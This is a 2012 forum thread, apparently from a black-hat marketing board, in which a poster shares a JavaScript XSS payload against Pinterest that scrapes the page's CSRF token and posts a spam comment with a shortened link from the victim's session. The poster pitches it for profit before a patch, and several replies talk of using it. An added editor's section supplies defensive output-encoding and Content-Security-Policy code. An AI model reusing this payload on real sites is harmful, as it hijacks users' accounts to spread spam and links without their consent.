
Pinterest XSS javascript payload [Advanced]

Discussion in 'Social Networking Sites' started by Fuggz, Apr 18, 2012.

  1. Fuggz

    Fuggz Power Member

    Joined:
    Mar 25, 2010
    Messages:
    584
    Likes Received:
    602
    I posted this in the VIP section but it didn't get too much appreciation and I think that there may be other members that will be able to use this. This isn't for members unfamiliar with XSS or javascript, but it is a good source to see the code that Pinterest uses for things (function parameters, variables, etc.). If you find an XSS vulnerability to execute this script, you could use this type of code to make some very nice $$$ before they find out and patch it.


    Code:
    getEmail();

    function getEmail() {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("GET", "http://pinterest.com/popular", true);

        xmlhttp.onreadystatechange = function() {
            if (xmlhttp.readyState == 4) {
                var html = xmlhttp.responseText;
                // "email" is a misnomer: this is the csrfmiddlewaretoken scraped out of the page HTML
                var email = html.match("csrfmiddlewaretoken' value='(.*)' /></div>");
                // first pin id that appears in a comment form on the page
                var code = html.match('form action="/pin/(.*)/comment/');
                updateProfile(code[1], email[1]);
            }
        }
        xmlhttp.send(null);
    }

    function updateProfile(code, email) {
        var httpwp = new XMLHttpRequest();
        var urlwp = "http://pinterest.com/pin/" + code + "/comment/";
        var paramswp = "text=get free makeup girls before it runs out :) http://bit.ly/zEpIbC&replies=&home=1";

        httpwp.open("POST", urlwp, true);

        httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        // Content-length, Connection and Referer are browser-controlled headers;
        // XMLHttpRequest silently ignores attempts to set them from script.
        httpwp.setRequestHeader("Content-length", paramswp.length);
        httpwp.setRequestHeader("Connection", "keep-alive");
        httpwp.setRequestHeader("X-CSRFToken", email);
        httpwp.setRequestHeader("Referer", "http://pinterest.com/pin/" + code + "/");
        httpwp.setRequestHeader("X-Requested-With", "XMLHttpRequest");

        httpwp.onreadystatechange = function() { // Call a function when the state changes.
            if (httpwp.readyState == 4 && httpwp.status == 200) {

            }
        }

        httpwp.send(paramswp);
    }
    *For educational purposes only*
     
    • Thanks x 3
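Editor's note with an added example (written for this page; it is not the poster's code and not Pinterest's code). The script above only works because it runs inside the site's own origin, where it can fetch a page and read the csrfmiddlewaretoken out of the HTML. A CSRF token is meant to stop cross-site requests, so it does nothing against a same-origin script; the control that actually matters is preventing the injection, which means encoding user-supplied values for the HTML context they land in and, as a second layer, a Content-Security-Policy that refuses inline script. The Node.js code below shows the unsafe template beside the encoded one and a small CSP parser that reports whether a policy would let inline script run. The comment text, author name and CSP value are constructed sample values, and the parser is deliberately simplified (nonces and hashes are not modelled).

```javascript
// Added example (not code from the thread or from Pinterest): the output
// encoding and CSP checks that keep an injected script like the one above
// from ever running. Plain Node.js, no dependencies.

// Escape a user-supplied string for an HTML element body or a double-quoted
// attribute value. Every special character becomes an entity, so the browser
// treats the whole value as text, never as markup.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// The sink: a server-side template that concatenates raw user input.
function renderCommentUnsafe(author, text) {
  return '<div class="comment" data-author="' + author + '">' +
         '<p>' + text + '</p></div>';
}

// The same template with every user value encoded for its context.
function renderComment(author, text) {
  return '<div class="comment" data-author="' + escapeHtml(author) + '">' +
         '<p>' + escapeHtml(text) + '</p></div>';
}

// Defence in depth: a policy with no 'unsafe-inline' in script-src means an
// inline <script> or on* handler is refused even if encoding is missed
// somewhere. (Constructed value, not any real site's policy.)
const CSP_HEADER =
  "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";

// Parse a Content-Security-Policy header value into {directive: [sources]}.
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) {
      directives[tokens[0].toLowerCase()] =
        tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return directives;
}

// True when the policy would let inline script execute. script-src falls
// back to default-src when absent; a policy with neither imposes no
// restriction at all. Simplified: nonces and hashes, which make
// 'unsafe-inline' ignored in modern browsers, are not modelled here.
function cspAllowsInlineScript(policy) {
  const d = parseCsp(policy);
  const src = d["script-src"] || d["default-src"];
  if (!src) return true;
  return src.includes("'unsafe-inline'");
}

// Constructed sample inputs standing in for attacker-controlled comment data.
const SAMPLE_TEXT = '<img src=x onerror="getEmail()">';
const SAMPLE_AUTHOR = 'x" onmouseover="getEmail()';

console.log("unsafe:", renderCommentUnsafe(SAMPLE_AUTHOR, SAMPLE_TEXT));
console.log("safe:  ", renderComment(SAMPLE_AUTHOR, SAMPLE_TEXT));
console.log("CSP allows inline script:", cspAllowsInlineScript(CSP_HEADER));
```

Run it with `node` and compare the two rendered lines: in the unsafe one the sample text becomes a live `<img>` element with an event handler and the author value breaks out of its attribute, while in the encoded one both stay inert text. The CSP check is the kind of assertion worth putting in a deployment test so that 'unsafe-inline' cannot creep back into script-src.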
  2. midnight_focus

    midnight_focus Power Member

    Joined:
    Dec 2, 2008
    Messages:
    779
    Likes Received:
    480
    Location:
    blogger
    I'll try to find a way to make some $$ with this and post it here
     
  3. dougphillip

    dougphillip Newbie

    Joined:
    Jan 30, 2013
    Messages:
    27
    Likes Received:
    9
    Interesting
     
  4. mnr39pro

    mnr39pro Newbie

    Joined:
    Oct 27, 2012
    Messages:
    35
    Likes Received:
    1
    Can you please explain what the code does exactly?
     
  5. Gogol

    Gogol Elite Member

    Joined:
    Sep 10, 2010
    Messages:
    3,114
    Likes Received:
    2,892
    Gender:
    Male
    R u kidding me?

    Mmm I smell money!!! Thanks added! I will try it out :)
     
  6. danny0085

    danny0085 Junior Member

    Joined:
    Jan 26, 2012
    Messages:
    149
    Likes Received:
    27
    Location:
    Bolivia
    Is this still working?